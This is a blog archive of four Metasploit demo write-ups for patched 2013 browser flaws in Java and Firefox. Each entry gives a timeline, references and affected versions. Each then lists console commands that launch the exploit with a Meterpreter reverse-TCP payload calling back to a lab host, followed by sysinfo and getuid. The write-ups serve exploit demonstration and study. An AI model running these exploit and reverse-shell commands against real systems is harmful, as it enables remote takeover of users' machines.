Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2013-1493 Java CMM Remote Code Execution

Timeline :

Discovered exploited in the wild in 2013-02
Metasploit PoC provided the 2013-03-26
Patched by the vendor the 2013-04-16

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-1493
OSVDB-90737
BID-58238
Oracle Security Alert for CVE-2013-1493

Affected version(s) :

Oracle Java SE 7 Update 15 and before
Oracle Java SE 6 Update 41 and before

Tested on :

Windows 7 SP1 with Java SE 7 Update 15

Description :

This module abuses the Color Management classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in February and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41 and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1 systems. This exploit doesn’t bypass click-to-play, so the user must accept the java warning in order to run the malicious applet.

Commands :

use exploit/windows/browser/java_cmm
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-0753 Firefox XMLSerializer Use After Free

Timeline :

Vulnerability discovered and reported to ZDI by regenrecht
Vulnerability reported to vendor by ZDI the 2012-11-21
Vulnerability corrected by vendor the 2013-01-08
Metasploit PoC provided the 2013-08-23

PoC provided by :

regenrecht
juan vazquez

Reference(s) :

CVE-2013-0753
OSVDB-89021
BID-57209
ZDI-13-006
MFSA-2013-16

Affected version(s) :

All versions of Mozilla Firefox previous version 17.0.2

Tested on :

with Firefox 17.0.1 on Windows XP SP3

Description :

This module exploits a vulnerability found on Firefox 17.0 (< 17.0.2), specifically a use-after-free of an Element object, when using the serializeToStream method with a specially crafted OutputStream defining its own write function. This module has been tested successfully with Firefox 17.0.1 ESR, 17.0.1 and 17.0 on Windows XP SP3.

Commands :

use exploit/windows/browser/mozilla_firefox_xmlserializer
set SRVHOST 192.168.6.138
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-2465 Java storeImageArray Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to Packet Storm by Name Withheld
Vulnerability corrected by vendor the 2013-06-18
PoC provided by Packet Storm the 2013-08-12
Metasploit PoC provided the 2013-08-19

PoC provided by :

Name Withheld
sinn3r
juan vazquez

Reference(s) :

CVE-2013-2465
OSVDB-96269
Packet Storm Exploit 2013-0811-1
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before
Oracle Java SE 6 Update 45 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to cause a memory corruption and escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.

Commands :

use exploit/multi/browser/java_storeimagearray
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid

CVE-2013-2460 Java Applet ProviderSkeleton Vulnerability Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Adam Gowdiak the 2013-04-22 (Issue 61)
Vulnerability corrected by vendor the 2013-06-18
Metasploit PoC provided the 2013-06-24
PoC provided by Adam Gowdiak the 2013-07-18

PoC provided by :

Adam Gowdiak
Matthias Kaiser

Reference(s) :

CVE-2013-2460
OSVDB-94346
SE-2012-01-ORACLE-12
Oracle Java SE Critical Patch Update Advisory – June 2013

Affected version(s) :

Oracle Java SE 7 Update 21 and before

Tested on Windows XP Pro SP3 with :

Java SE 7 Update 17

Description :

This module abuses the insecure invoke() method of the ProviderSkeleton class that allows to call arbitrary static methods with user supplied arguments. The vulnerability affects Java version 7u21 and earlier.

Commands :

use exploit/multi/browser/java_jre17_provider_skeleton
set RHOST 192.168.0.20
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.0.20
exploit

sysinfo
getuid